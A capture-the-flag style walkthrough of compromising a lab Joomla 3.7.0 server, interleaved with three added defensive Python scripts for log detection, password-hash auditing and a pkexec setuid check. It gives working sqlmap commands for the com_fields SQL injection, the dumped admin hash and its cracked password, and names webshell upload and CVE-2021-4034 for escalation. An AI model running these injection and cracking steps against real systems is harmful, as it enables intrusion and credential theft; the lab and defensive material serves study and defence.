The CMS is identified as Joomla, so the next step is to locate the admin backend.

joomscan

[+] admin finder                                                             
[++] Admin page : http://192.168.88.139/administrator/  

searchsploit is a command-line search tool for Exploit-DB that helps find exploit modules. Kali Linux ships a local copy of the Exploit-DB database, mainly so that it can be used without network access. Usage is searchsploit followed by the name of the software or system that may be vulnerable, and so on.

└─$ searchsploit joomla 3.7.0      
------------------------------------------- ---------------------------------
Exploit Title                             | Path
------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - C | php/webapps/43488.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

Then:

└─$ searchsploit -p 42033
Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
    URL: https://www.exploit-db.com/exploits/42033
    Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
File Type: ASCII text

Look at the details and try the payload given in the advisory:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -T "#__users" --columns

Brute-force the column names here:

do you want to use common column existence check? [y/N/q] y
[23:05:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom
> 10
# chooses the number of threads

Brute-force succeeded:

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| id       | numeric     |
| name     | non-numeric |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
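From the defender's side, the requests above leave a clear trace in the web server's access log. The following Python script is an added example, not part of the original walkthrough: it parses Apache combined-format log lines and flags requests whose list[fullordering] value falls outside the shape Joomla itself generates (a column name followed by ASC or DESC), that contain SQL/XML function names, or that carry the sqlmap user-agent. The log lines, addresses and timestamps are constructed for the example. Because --random-agent hides the sqlmap user-agent, the parameter allowlist is the check that actually matters.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache "combined" format; addresses, timestamps and
# user-agents are invented for this example.
SAMPLE_LOG = """\
192.168.88.1 - - [08/Dec/2022:03:40:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.88.1 - - [08/Dec/2022:03:40:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 312 "-" "sqlmap/1.6#stable (https://sqlmap.org)"
192.168.88.1 - - [08/Dec/2022:03:40:06 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 312 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.168.88.1 - - [08/Dec/2022:03:41:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# A legitimate Joomla list ordering value looks like "<alias>.<column> ASC|DESC".
ORDERING_OK = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]* (ASC|DESC)$', re.IGNORECASE)
# SQL/XML functions that never belong in a Joomla request parameter.
SQL_FUNCS = re.compile(r'\b(updatexml|extractvalue)\b', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict; the query string is decoded into a dict too."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['query'] = parse_qs(urlsplit(rec['target']).query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the reasons a parsed request looks like the com_fields ordering injection."""
    reasons = []
    if 'sqlmap' in rec['ua'].lower():
        reasons.append('sqlmap user-agent')
    for value in rec['query'].get('list[fullordering]', []):
        if not ORDERING_OK.match(value):
            reasons.append('list[fullordering] outside allowlist: %r' % value)
    if SQL_FUNCS.search(unquote(rec['target'])):
        reasons.append('SQL function name in request target')
    return reasons


def find_suspicious(lines):
    """Run classify() over raw log lines and collect the hits with their reasons."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append({'ip': rec['ip'], 'ts': rec['ts'],
                         'status': rec['status'], 'reasons': reasons})
    return hits


if __name__ == '__main__':
    for hit in find_suspicious(SAMPLE_LOG.splitlines()):
        print(hit['ts'], hit['ip'], hit['status'], '; '.join(hit['reasons']))
```

Run against a real access log with `find_suspicious(open('access.log'))`. The status code is kept in each hit because the injection attempts in the sample produce 500s, which is a useful secondary signal when the parameter check is tuned for a different Joomla component.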

Save the hash to a file.

Use john to crack the password hash.

┌──(root㉿kali)-[/usr/share/wordlists]
└─# vim pass.txt
                                                                           
┌──(root㉿kali)-[/usr/share/wordlists]
└─# john --wordlist=rockyou.txt pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (?)    
1g 0:00:00:01 DONE (2022-12-08 03:52) 0.9523g/s 137.1p/s 137.1c/s 137.1C/s shadow..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
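john reports "Cost 1 (iteration count) is 1024", which is 2^10 for the $2y$10$ prefix: the hash algorithm held up, and the password fell only because "snoopy" is in rockyou.txt. The Python below is an added example, not part of the walkthrough, that audits the hash column of a Joomla user table: it parses each hash, derives the bcrypt cost, and flags rows below a policy minimum or still stored in the legacy md5:salt format. The minimum cost of 12, the "editor" and "legacy" rows, and their hash values are assumptions constructed for the example; only the admin row reuses the hash shown above.

```python
import re

# Constructed audit input: the first row reuses the hash dumped above; the other two are
# invented to show a weak-cost bcrypt hash and a legacy Joomla "md5:salt" entry.
USER_ROWS = [
    ("admin", "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"),
    ("editor", "$2y$04$" + "a" * 53),                        # invented: cost 4 is far too cheap
    ("legacy", "0123456789abcdef" * 2 + ":" + "saltsaltsaltsaltsaltsaltsaltsalt"),  # invented
]

# Modular-crypt bcrypt: $2a|2b|2y$ <2-digit cost> $ <22-char salt + 31-char digest>.
BCRYPT_RE = re.compile(r'^\$(2[aby])\$(\d{2})\$[./A-Za-z0-9]{53}$')
# Pre-3.2 Joomla format: md5(password + salt) followed by ":" and the 32-char salt.
MD5_SALTED_RE = re.compile(r'^[0-9a-f]{32}:[A-Za-z0-9]{32}$')


def parse_hash(h):
    """Describe a stored hash: scheme, and for bcrypt the cost factor and iteration count."""
    m = BCRYPT_RE.match(h)
    if m:
        cost = int(m.group(2))
        return {"scheme": "bcrypt", "variant": m.group(1), "cost": cost, "iterations": 2 ** cost}
    if MD5_SALTED_RE.match(h):
        return {"scheme": "md5-salted", "variant": None, "cost": None, "iterations": 1}
    return {"scheme": "unknown", "variant": None, "cost": None, "iterations": None}


def audit(rows, min_cost=12):
    """Return (username, finding) pairs for rows that do not meet the hashing policy."""
    findings = []
    for user, h in rows:
        info = parse_hash(h)
        if info["scheme"] == "bcrypt":
            if info["cost"] < min_cost:
                findings.append((user, "bcrypt cost %d below policy minimum %d"
                                 % (info["cost"], min_cost)))
        else:
            findings.append((user, "non-bcrypt hash (%s): force a reset so it is rehashed"
                             % info["scheme"]))
    return findings


if __name__ == "__main__":
    for user, finding in audit(USER_ROWS):
        print("%-8s %s" % (user, finding))
```

Raising the cost only slows an attacker down linearly; a password present in a public wordlist still falls in seconds, as the john run shows, so the cost check belongs next to a blocklist check on new passwords rather than instead of one.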

The password is snoopy, so log in to the backend.

Browsing the site, there is a file upload point under Templates.

1 Upload a one-line webshell directly and connect with AntSword

2 Reverse shell

3 msf

Privilege escalation via a vulnerability

Check the operating system: uname -a / lsb_release -a

CVE-2021-4034 exploit
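On the defensive side, CVE-2021-4034 turns on pkexec being a setuid-root binary, and the widely published interim mitigation was to clear that bit until the vendor's fixed polkit package could be installed. The Python below is an added example, not part of the walkthrough: it inventories setuid files in the usual binary directories and reports whether pkexec on this host still carries the setuid bit. The directory list is an assumption for the example; the real fix remains the patched package, the check only tells you whether the stopgap is in place.

```python
import os
import stat

# Directories where distributions normally install setuid helpers (assumed default list).
DEFAULT_DIRS = ["/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin"]


def describe(path):
    """Return (is_setuid, owner_uid, permission_bits) for a regular file, else None."""
    try:
        st = os.lstat(path)
    except OSError:
        return None
    if not stat.S_ISREG(st.st_mode):
        return None
    return (bool(st.st_mode & stat.S_ISUID), st.st_uid, stat.S_IMODE(st.st_mode))


def inventory_setuid(dirs=DEFAULT_DIRS):
    """List every regular file with the setuid bit directly under the given directories."""
    found = []
    for d in dirs:
        try:
            names = os.listdir(d)
        except OSError:
            continue  # directory absent or unreadable on this host
        for name in sorted(names):
            path = os.path.join(d, name)
            info = describe(path)
            if info and info[0]:
                found.append((path, info[1], info[2]))
    return found


def pkexec_mitigated(path="/usr/bin/pkexec"):
    """True when pkexec is absent or no longer setuid, i.e. the interim mitigation is in place."""
    info = describe(path)
    return info is None or not info[0]


if __name__ == "__main__":
    for path, uid, mode in inventory_setuid():
        print("%-30s uid=%-5d mode=%04o" % (path, uid, mode))
    print("pkexec setuid bit cleared:", pkexec_mitigated())
```

Run as an unprivileged user this still works, since directory listing and stat need no special rights. Keep the inventory output from a known-good build so later runs can be diffed: a new setuid-root file appearing in one of these directories is worth a look regardless of pkexec.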